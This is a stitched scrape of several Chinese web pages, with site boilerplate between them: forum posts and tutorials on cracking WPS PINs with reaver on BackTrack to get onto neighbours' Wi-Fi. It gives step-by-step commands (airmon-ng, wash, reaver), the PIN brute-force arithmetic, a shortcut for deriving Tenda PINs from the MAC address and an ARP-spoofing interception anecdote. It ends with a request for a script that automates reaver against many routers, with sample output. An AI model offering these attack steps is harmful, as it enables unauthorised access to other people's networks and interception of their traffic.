1位大师级Pin码破解经验口述
蹭网必看 强势推荐
本人破掉18 个 pin 的总结
（复杂电磁环境下提高 pin 速度）
口号：pj 只为乐趣,不为 ceng 网!
一、先说系统兼容性：最初用 xiaopan 各个版本，rfll 问题不断，对 8187 的兼容性真的不好，而且貌
似最新版本仍旧没有解决此问题。 后然用 cdlinuxfor8187，很好用（如果要下载 iso 光盘版本的
cdlinux，另有虚拟机 vmware8.0 直接可打开的 cdlinux带硬盘版本 bt5 我没用，一是 iso
文件太大下载慢，二是系统启动也慢。
二、再说软件：reaver 命令方式就不推荐了，打命令太麻烦（其实下面两个软件都是调用 reaver 命令 的） inflator
打气筒，强烈推荐，我自己的经验是在打气筒参数页面，只要选－S 就行了，－S 的作用是优化速度，论坛有人说用－t 10
等命令延长等待时间，实际效果并不好。 minidwep－gtk 这个集成破 wep，抓包，跑 pin
于一体的工具，这个工具在虚拟机里响应速度较慢，我 不常用。
三、reaver 版本和 pin 优化问题：有人形容 reaver1.3 是乱枪扫射（虽然乱，但不漏码），reaver1.4
是按照顺序一个一个来，有人说 1.4 漏码，但是我不这么认为（下面会说漏码原理）。reaver1.4 的好
处时，只要记住百分之几或者前 4位，就能记住进度，这里有破 pin 时存储进度方法方法总结(有4 种方 法)
reaver1.4，当然我 上面提供的系统都只带了 1.4 的。 pin 优化完全就是无稽之谈（tenda
除外），所以不要下载所谓的优化过的 wpc，那样只会增加漏码的 风险，pin 优化毫无根据的，目前来说 pin
完全是随机的（虽然理论上任何机器生成的随机数都是伪随机 数），所以其实你用 1.3 和 1.4 出密的几率一样，有 0 开头的
pin，也有 9 开头的 pin。
tenda 路由 network 路由可以通过计算算出对应的 pin 值
下页余下全文1/4
已投稿到：
以上网友发言只代表其个人观点，不代表新浪网的观点或立场。您现在的位置： &
如何在BT5下破解WPS无线路由器的PIN码和密码
如何在BT5下破解WPS无线路由器的PIN码和密码
　　点评：做了下，发现方法还是很简单，只是时间消耗也有点久，从12点一直跑到5点，算我运气差
　　做了下，发现方法还是很简单，只是时间消耗也有点久，从12点一直跑到5点，算我运气差吧。
　　1.把无线网卡调整到Monitor模式，这样就可以监听无线网卡的流量了。具体方法是： airmon-ng start wlan0。
　　之后用ifconfig命令能查找到mon0这个设备，就代表设置成功了。
　　2.下载安装reaver软件。
　　3.使用wash -i mon0命令，就可以查找出周边那些路由器是开启了WPS功能的。
　　当然，如果没有这个命令，也可以用BT5自带的airdump-ng mon0.显示的路由器里面，如果出现了wps的标准就对了。
　　4.选择有WPS的一个路由器（一定要信号好的，应该至少高于-75），使用命令 reaver -i mon0 -b MAC -vv
　　其中MAC是指在第三个步骤中显示的路由器的MAC地址，超过来就可以了。-vv是两个v，而不是w哦。
　　这样reaver软件就开始工作了。一个个PIN码试过去，先是PIN码的前面4位改变，等前面4位出来了就成功了90%，就是后面3位就会很快出来了。
　　当然，理论上PIN码的可能性是10^4+10^3=11000个，那么按一般信号，每秒测试3个PIN码，那么把所有的遍历完将会使用9.2个小时。那么平均使用时间是4.6个小时了，所以还是要看运气。。当然只要时间够了，信号好了，WPS的密码一定是能破解出来的。。。
&&&主编推荐
&&&热门试卷
&&&最新视频
&&&热门阅读
&&&最新问答
&&&&&&&&&&&&&&&
希赛网 版权所有 & &&&&增值电信业务经营许可证湘B2-您的位置： >
> 阅读资讯：Wifi密码PIN破解教程,Wifi密码如何破解图文
Wifi密码PIN破解教程,Wifi密码如何破解图文
PIN破解是近年来流行起来的wifi密码破解最有效的方式了。那什么是PIN？有什么用？
& & & 这里要先说一个概念，，&WPS（Wifi Protected Setup）是一种免输密码和的建议无线配置协议，它的好处是能够让支持WPS的设备，在第一次连接某个设备时，能够通过不用手工输入SSID和密码的方式，自动建立连接。
& & &&因为方便，所以危险。如果我们知道一个路由的SSID和PIN，那么我们就可以光明正大的进到这个wifi网络中，即时我们不知道wifi的密码也没关系。而一旦我们知道PIN，那WPA2加密方式也形同虚设，我们可以通过上文说的Reaver软件来获取密码。
& & &&PIN码的格式很简单，&八位十进制数，最后一位（第8位）为校验位(可根据前7位算出)，验证时先检测前4位，如果一致则反馈一个信息，所以只需1万次就可完全扫描一遍前4位，前4位确定下来的话，只需再试1000次（接下来的3位），校验位可通过前7为算出，就可暴力验证出pin码。所以即时你不知道校验位怎么计算，那你最多尝试+10次=11010次就可以获得PIN，从而获得wifi密码，是不是简单很多？
& & &先放图，这里为了方便演示，我以自己的路由为例。假设已经获得了PIN（），这是我Tplink的PIN码。从路由界面获取。
& &（1）.和上文一样，先扫描出可用的无线网络，不过这次就不用抓包了。因为你是直接PIN路由的，也不需要有设备在线。点击Reaver。
& & & &（3）&在命令栏添加&-p，意思是从开始PIN，这样的话，一下子就可以获得PIN码，正常情况下不知道的话，不用填，直接点击OK，然后等待密码出来就可以了。
& & & &因为这里测试PIN已知，所以不到10秒钟，密码就出现了。&
& & & & 另外还会保存一份在BT5 Root/tmp下
& & & & So，这种方法获取wifi密码不言而喻是很高效的，理论上也是必破。&
& & & & 以上我是事先获知PIN进行演示，所以很快，但是正常情况下不知道PIN是多少，这时候怎么办？这里有一些诀窍。
& & & & 由于PIN是随机生成的一个8位10进制数。所以这是由各路由厂商生成的。腾达（Tenda）部分路由（C83A35，00B00C）是由MAC的前6位16进制数直接转化为7位10进制数外加一个检验码生成，算法弱爆了。所以可以直接通过Dec2Hex计算出来。&&而像DLink对PIN错会有延迟，这样会导致PIN速度很慢，间接起到防PIN的作用，还有很多其他的，针对不同的路由可以去网上找相关资料。而有一些TPLink是直接带有防PIN功能的。当然这都是需要时间的，所以要有耐心。
& & & &有一些所谓PIN优化的建议不要相信，PIN没有所谓优不优化，万一漏PIN了又要换个姿势，再来一次。&
& & & &对于一些隐藏SSID的，可以通过BT5桌面上的FeedingBattle奶瓶来获取。
& & & 接下来说一下wifi被蹭的危害。
& & & 当然善类只是蹭一下网络使用，省钱共享网络而已。顶多开下载导致网络稍卡而已。
& & & 但是，如果带有恶意的话，在入侵你的wifi后就可以对你发动arp攻击。举个例子。
& & & 我蹭了郭四娘的wifi，刚好四娘和韩寒在聊天。
& & & 通过对四娘的电脑发送虚假的arp信息，我把自己的主机伪装成网关。这个过程是合理的，且无法被发现。因为802.11协议在下三层LAN中默认是互相信任的，因为只有在互相信任的前提下，你们才会在同一个局域网内。但是这个时候我是偷偷进入的，四娘和网关都不知道。
& & & 四娘说：韩寒我恨你。
& & & 作为伪装的网关，我先接到这条信息，然后我进行篡改：&韩寒我爱你&。接着发送给真正的网关，由网关发送给韩寒。
& & & 韩寒回：&。
& & & 然后我对网关发送虚假的arp信息，把自己伪装成四娘。就会接收到这个表情。再进行篡改：&&&。然后发送给真正的四娘。
& & & 最后他们两个在一起了。&
& & & 这个例子很烂，但是说明了局域网被蹭的危害，当然骇客做的不只是这些。上面这个流程在实现上不难。只是做几个原始套接字的包，自己封装好TCP/IP的协议头进行发送就可以了。然后再对数据进行获取篡改就OK。其实这也是360的主动防御原理，自己主动给网关发送arp信息，防止被欺骗。
& & & 好了，先这样吧。码累了，wifi防蹭且听下回分解吧。其实这两篇也暴露了不少防范的方法了。哈哈。反其道而行之，是吧？
最新图文列表
相关文章列表
热门图文资讯新手园地& & & 硬件问题Linux系统管理Linux网络问题Linux环境编程Linux桌面系统国产LinuxBSD& & & BSD文档中心AIX& & & 新手入门& & & AIX文档中心& & & 资源下载& & & Power高级应用& & & IBM存储AS400Solaris& & & Solaris文档中心HP-UX& & & HP文档中心SCO UNIX& & & SCO文档中心互操作专区IRIXTru64 UNIXMac OS X门户网站运维集群和高可用服务器应用监控和防护虚拟化技术架构设计行业应用和管理服务器及硬件技术& & & 服务器资源下载云计算& & & 云计算文档中心& & & 云计算业界& & & 云计算资源下载存储备份& & & 存储文档中心& & & 存储业界& & & 存储资源下载& & & Symantec技术交流区安全技术网络技术& & & 网络技术文档中心C/C++& & & GUI编程& & & Functional编程内核源码& & & 内核问题移动开发& & & 移动开发技术资料ShellPerlJava& & & Java文档中心PHP& & & php文档中心Python& & & Python文档中心RubyCPU与编译器嵌入式开发驱动开发Web开发VoIP开发技术MySQL& & & MySQL文档中心SybaseOraclePostgreSQLDB2Informix数据仓库与数据挖掘NoSQL技术IT业界新闻与评论IT职业生涯& & & 猎头招聘IT图书与评论& & & CU技术图书大系& & & Linux书友会二手交易下载共享Linux文档专区IT培训与认证& & & 培训交流& & & 认证培训清茶斋投资理财运动地带快乐数码摄影& & & 摄影器材& & & 摄影比赛专区IT爱车族旅游天下站务交流版主会议室博客SNS站务交流区CU活动专区& & & Power活动专区& & & 拍卖交流区频道交流区
空间积分0 信誉积分52 UID阅读权限10积分14帖子精华可用积分14 专家积分0 在线时间17 小时注册时间最后登录
白手起家, 积分 14, 距离下一级还需 186 积分
帖子主题精华可用积分14 专家积分0 在线时间17 小时注册时间最后登录
论坛徽章:0
本帖最后由 xzwcn 于
19:21 编辑
13:58 上传
13:58 上传
13:58 上传
13:58 上传
好了，情况介绍到这儿，现在，我想有一个脚本可以这样：
在脚本中写好一些控制语句执行的命令，可以批量把要运行命令粘贴在脚本中，
脚本会根据情况执行不同的命令，以下为伪命令表述：#要运行的命令（如把第一张图的粘贴如下）：
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
reaver -i mon0 -b XX:XX:XX:XX -a -S -vv -d 0
#要求：一次只运行其中一行命令，当出现问题【网卡断开】，如第4张图的
#【飞快刷屏】
/*
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: (null))
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: (null))
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: (null))
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: (null))
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: (null))
*/
#当出现这些屏显时，脚本将自动执行【Ctrl+C】结束【刷屏】。
#当遇到【目标路由关闭】或【无法PIN】或【超时】或【PIN】速度变为【几十秒】或【PIN码成功得到】时，
---------------------------------------------------
以上为不同情况时的屏显结果：
--------------------------------
【目标路由关闭】
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[!] WARNING: Failed to associate with (ESSID: XXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: XXXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: )
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: XXXXX)
^C
[+] Nothing done, nothing to save.
【无法PIN,路由器没开户WPS】
【超时】
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
.......
【PIN速度变为【几十秒】
] Sending WSC NACK
[+] 96.07% complete @
01:13:17 (34 seconds/pin)
[+] Trying pin
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
【PIN码成功得到】
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 43 seconds
[+] WPS PIN: 'XXXXXX'
[+] WPA PSK: 'XXXXXX'
[+] AP SSID: 'XXXX'
root@bt:~#
---------------------------------------------------------------------------
---------------------------------------------------------------------------
#将自动停止运行当前命令，【切换】到上面的其它行命令。
#接下来，就是上面工作的循环。复制代码懂得LINUX脚本编程的人，写起来应该不难，但我没有这方面的基础。。。
只会点Windos下的批处理，所以把上面的思路说一下，请各位指教！
是根据【屏显结果】还是【软件运行进程状态】来判断以上情况好呢？
最在最后：
大家看懂的意思了么？呵呵，有用命令进行过PIN码破解的的朋友应该能很快看懂的，
如果，这个脚本写出来后，我们的工作就轻松多了。毕竟，对一个路由的PIN码破解往往需要好
几个小时，当它出现上述问题后，除非我们当场发现，从而执行不同命令。
但现实中的情况往往是我们不可能一直坐在电脑面前看着它运行，出现问题后，马上解决。
通常它在运行时，我们是离开电脑的，如外出、晚上睡觉、看电影等的时候，开着让它PIN，
如果出现了上术问题而没有马上解决，BT5这样一直在做无用功。。这样太浪费资源了。。。
&&nbsp|&&nbsp&&nbsp|&&nbsp&&nbsp|&&nbsp&&nbsp|&&nbsp
Go free, go shell.
空间积分0 信誉积分2356 UID28783阅读权限100积分30087帖子精华可用积分31125 专家积分10 在线时间2899 小时注册时间最后登录
帖子主题精华可用积分31125 专家积分10 在线时间2899 小时注册时间最后登录
论坛徽章:11
要当黑客，还得要自学能力强啊．看看reaver 命令里是否已经自带　ｔｉｍｅｏｕｔ　参数了。设一下这个或许解决你的大部分问题了。
至于要连续读入不同的ＭＡＣ地址，可以用这个脚本：while read line
do
& &echo $line
done & mand.list复制代码成功的话，把ｅｃｈｏ去掉再运行一遍即可。
shell 版主
北京皓辰网域网络信息技术有限公司. 版权所有 京ICP证:060528号 北京市公安局海淀分局网监中心备案编号：
广播电视节目制作经营许可证(京) 字第1234号
中国互联网协会会员&&联系我们：
感谢所有关心和支持过ChinaUnix的朋友们
转载本站内容请注明原作者名及出处